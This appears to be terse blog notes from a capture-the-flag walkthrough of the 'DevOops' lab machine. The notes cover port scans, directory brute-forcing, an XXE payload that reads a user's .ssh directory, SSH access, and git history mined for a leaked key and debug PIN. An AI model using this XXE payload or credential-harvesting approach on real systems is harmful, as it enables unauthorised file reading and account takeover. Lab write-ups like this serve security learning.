DevOops

Nmap scan report for 10.10.10.91
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
root@kali:~# nmap -p 5000 -sC -sV 10.10.10.91

Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-25 16:52 BST
Nmap scan report for 10.10.10.91
Host is up (0.035s latency).

PORT     STATE SERVICE VERSION
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

root@kali:~# dirb http://10.10.10.91:5000 /usr/share/dirb/wordlists/common.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jun 25 18:12:12 2018
URL_BASE: http://10.10.10.91:5000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.91:5000/ ----
+ http://10.10.10.91:5000/feed (CODE:200|SIZE:546263)                          
^[[A^?^?^?^? http://10.10.10.91:5000/forgot-password                           


+ http://10.10.10.91:5000/upload (CODE:200|SIZE:347)                           
                                                                               
-----------------
END_TIME: Mon Jun 25 18:21:37 2018
DOWNLOADED: 4612 - FOUND: 2

http://10.10.10.91:5000/upload

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/roosa/.ssh" >]>
<creds>
    <Author>&xxe;</Author>
    <Subject>mypass</Subject>
  <Content>Reminder</Content>
</creds>

authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4wy3iqH+JvzrEkEubN4+Xr/llE0mRSP9e6/X53qdxxN99v/v2wheFraHhrh+nXwXneN3Hc+oQ7scBeWzMCUG8Z2DreL4vFaa7ynkGtOYQ+X5xDglH9H57E2CAe6qynyutwer3qVte05HLxI6WJSN+yk+xZ9jsluS0rJpArQm6dHbmNWS/liEZV7JpM2ZI09OWlkJUZUCnVGi1Z1z/R7HurOerjnAtva1kUYTTGZhN5eChpfj1AhBCeiLoM/f7sStBJ3pAZOrmYK+zOmdNSybAWPklF2GMazO3TMEaWWxWf3073Qqbek3xI3XJYJNqXoUtSK7FeD31hJXS0SXSt9JT roosa@gitter

root@kali:~/Desktop# ssh -i roosa.ssh [email protected]

https://digi.ninja/blog/when_all_you_can_do_is_read.php

roosa@gitter:~$ find -name '*' -print

roosa@gitter:~$ find ~ -name bran*

roosa@gitter:~/work/blogfeed/src$ git checkout @{-1}
M	run-gunicorn.sh
Switched to branch 'master'
Your branch is up-to-date with 'origin/master'.
roosa@gitter:~/work/blogfeed/src$ git checkout @{-1}
M	run-gunicorn.sh
Switched to branch 'first'

you don't have to checkout. git log displays you the changes, then you can just do "git diff COMMIT1 COMMIT2" to display the differences. This should bring you root

roosa@gitter:~/work/blogfeed/src$ git diff 
diff --git a/run-gunicorn.sh b/run-gunicorn.sh
index 07f8fb3..b3fc256 100755
--- a/run-gunicorn.sh
+++ b/run-gunicorn.sh
@@ -1,7 +1,7 @@
 #!/bin/sh
 
 export FLASK_APP=feed.py
-export WERKZEUG_DEBUG_PIN=15123786
+export WERKZEUG_DEBUG_PIN=151237652
 gunicorn -w 10 -b 0.0.0.0:5000 --log-file feed.log --log-level DEBUG --access-logfile access.log feed:app
 
 
roosa@gitter:~/work/blogfeed/src$

roosa@gitter:~/work/blogfeed/src$ git log
commit 26ae6c8668995b2f09bf9e2809c36b156207bfa8
Author: Roosa Hakkerson <[email protected]>
Date:   Tue Mar 20 15:37:00 2018 -0400

    Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.

commit cec54d8cb6117fd7f164db142f0348a74d3e9a70
Author: Roosa Hakkerson <[email protected]>
Date:   Tue Mar 20 15:08:09 2018 -0400

    Debug support added to make development more agile.

commit ca3e768f2434511e75bd5137593895bd38e1b1c2
Author: Roosa Hakkerson <[email protected]>
Date:   Tue Mar 20 08:38:21 2018 -0400

    Blogfeed app, initial version.

commit dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94
Author: Roosa Hakkerson <[email protected]>
Date:   Tue Mar 20 08:37:56 2018 -0400

    Gunicorn startup script

commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <[email protected]>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key

commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson <[email protected]>
Date:   Mon Mar 19 09:32:03 2018 -0400

    add key for feed integration from tnerprise backend

commit 1422e5a04d1b52a44e6dc81023420347e257ee5f
Author: Roosa Hakkerson <[email protected]>
Date:   Mon Mar 19 09:24:30 2018 -0400

    Initial commit
roosa@gitter:~/work/blogfeed/src$

roosa@gitter:~/work/blogfeed/src$ git log - p

root ssh

Recent Posts

Categories

DevOops

Recent Posts

Categories

Tag cloud